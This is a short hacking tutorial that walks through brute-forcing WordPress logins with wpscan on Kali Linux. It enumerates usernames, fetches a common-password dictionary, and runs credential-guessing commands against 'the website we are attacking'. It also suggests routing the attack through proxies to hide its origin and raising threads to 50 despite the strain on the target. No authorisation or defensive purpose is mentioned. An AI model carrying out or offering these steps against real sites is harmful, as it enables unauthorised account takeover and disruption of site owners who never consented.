Boot up your Kali Linux distro and let's get started. Alright - all opened up. We want to run a wpscan on the website we are attacking while also using the "--enumerate u" toggle to find usernames. It might also find some XSS or other vulns known so pay attention to those too.
- wpscan --url website.com --enumerate u
- Our output should look like this - we can see 3 usernames we can try attack.
- Before we start our attack, let's get a dictionary to attack it with. Here's a pretty decent one with common wordpress passwords
>wget is the command we can use to get that file from a direct download link.
- Then we need to unzip it
- unzip wpw_pwd_dictionary.zip
- We also need to create our username list file so we can do this:
- nano usernames.txt
- We type in
wpscan --url website.com -P wpw_pwd_dictionaryt.txt -U usernames.txt
- You can add on proxies by using the toggle or http proxies by changing socks5 to http/https or whatever you are after.
- You can also choose how many threads the program will use which can cause more issues with the target site but will be faster - an example to our command would be:
wpscan --url website.com -P wpw_pwd_dictionaryt.txt -U usernames.txt --threads 50